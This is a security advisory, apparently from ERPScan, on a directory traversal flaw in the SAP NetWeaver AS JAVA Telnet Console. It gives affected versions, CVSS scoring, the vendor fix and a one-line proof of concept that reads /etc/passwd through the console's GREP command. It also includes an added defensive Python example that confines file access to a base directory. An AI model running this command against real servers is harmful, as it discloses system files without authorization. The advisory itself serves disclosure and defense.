
SAP NetWeaver AS JAVA 7.5 Directory Traversal Vulnerability

19 Nov 2016 | Reported by Mathieu Geli | Type: zdt | Source: 0day.today

The SAP NetWeaver AS JAVA 7.5 directory traversal vulnerability allows file disclosure outside of the JVM through the Telnet Console service

Code
Application: SAP NetWeaver AS JAVA

Versions Affected: SAP NetWeaver AS JAVA 7.1 to 7.5

Vendor URL: http://SAP.com

Bugs: Directory traversal

Sent:  04.12.2015

Reported: 05.12.2015

Vendor response: 05.12.2015

Date of Public Advisory: 09.08.2016

Reference: SAP Security Note  2280371

Author:   Mathieu Geli (ERPScan)



Description


1. ADVISORY INFORMATION

Title: [ERPSCAN-16-032] SAP Telnet Console - Directory traversal vulnerability

Advisory ID: [ERPSCAN-16-032]

Risk: high

Advisory URL: https://erpscan.com/advisories/erpscan-16-032-sap-netweaver-telnet-console-file-disclosure/

Date published: 11.11.2016

Vendors contacted: SAP


2. VULNERABILITY INFORMATION

Class: Directory traversal

Impact: read file from system

Remotely Exploitable: yes

Locally Exploitable: yes



CVSS Information

CVSS Base Score v3:   3.4 / 10

CVSS Base Vector:

AV : Attack Vector (Related exploit range) Adjacent (A)

AC : Attack Complexity (Required attack complexity) Low (L)

PR : Privileges Required (Level of privileges needed to exploit) High (H)

UI : User Interaction (Required user participation) None (N)

S : Scope (Change in scope due to impact caused to components beyond the vulnerable component) Changed (C)

C : Impact to Confidentiality Low (L)

I : Impact to Integrity None (N)

A : Impact to Availability None (N)



3. VULNERABILITY DESCRIPTION

An authenticated user can disclose file content outside of the JVM
through the SAP Telnet Console service.


4. VULNERABLE PACKAGES

J2EE ENGINE SERVERCORE 7.10

J2EE ENGINE SERVERCORE 7.11

J2EE ENGINE SERVERCORE 7.20

J2EE ENGINE SERVERCORE 7.30

J2EE ENGINE SERVERCORE 7.31

J2EE ENGINE SERVERCORE 7.40

J2EE ENGINE SERVERCORE 7.50


5. SOLUTIONS AND WORKAROUNDS

To correct this vulnerability, install SAP Security Note 2280371.



6. AUTHOR

  Mathieu Geli (ERPScan)


7. TECHNICAL DESCRIPTION


File disclosure in the SAP NetWeaver Telnet Console via the GREP command of
the SYSTEM admin group.


7.1. Proof of Concept


GREP ":" /etc/passwd


at:x:25:25:Batch jobs daemon:/var/spool/atjobs:/bin/bash

bin:x:1:1:bin:/bin:/bin/bash

daemon:x:2:2:Daemon:/sbin:/bin/bash

[...]
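
The PoC passes an absolute path, so a filter that only strips `../` sequences would not stop it. The following is an added example, not code from the advisory, ERPScan or SAP, and not the fix shipped in SAP Security Note 2280371: a hypothetical GREP-style command confined to an allowed base directory (`confine`, `grep`, `demo` and the sample files are assumptions constructed for illustration).

```python
import os
import tempfile
from pathlib import Path


class PathOutsideBase(Exception):
    """Raised when a requested file resolves outside the allowed base."""


def confine(base_dir, requested):
    """Resolve `requested` against `base_dir`; refuse anything that escapes it."""
    base = Path(base_dir).resolve(strict=True)
    # Joining a base with an absolute path discards the base, so checking for
    # ".." alone misses "/etc/passwd". Canonicalise (follows symlinks) first.
    candidate = (base / requested).resolve()
    if candidate != base and base not in candidate.parents:
        raise PathOutsideBase(f"{requested!r} resolves outside {base}")
    return candidate


def grep(base_dir, pattern, requested):
    """Hypothetical GREP-style command: substring match, confined to base_dir."""
    path = confine(base_dir, requested)
    with open(path, encoding="utf-8", errors="replace") as fh:
        return [line.rstrip("\n") for line in fh if pattern in line]


def demo():
    """Run constructed requests through grep(); report allowed or denied."""
    results = {}
    with tempfile.TemporaryDirectory() as root:
        base = os.path.join(root, "work")
        os.mkdir(base)
        with open(os.path.join(base, "server.log"), "w") as fh:
            fh.write("info: started\nerror: constructed sample line\n")
        with open(os.path.join(root, "secret.txt"), "w") as fh:
            fh.write("outside:the:base\n")
        os.symlink(os.path.join(root, "secret.txt"), os.path.join(base, "link"))
        for req in ["server.log", "/etc/passwd", "../secret.txt", "link"]:
            try:
                grep(base, ":", req)
                results[req] = "allowed"
            except PathOutsideBase:
                results[req] = "denied"
    return results


if __name__ == "__main__":
    print(demo())
```
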


8. REPORT TIMELINE

Sent: 04.12.2015

Reported: 05.12.2015

Vendor response: 05.12.2015

Date of Public Advisory: 09.08.2016


9. REFERENCES

https://erpscan.com/advisories/erpscan-16-032-sap-netweaver-telnet-console-file-disclosure/

#  0day.today [2018-04-11]  #
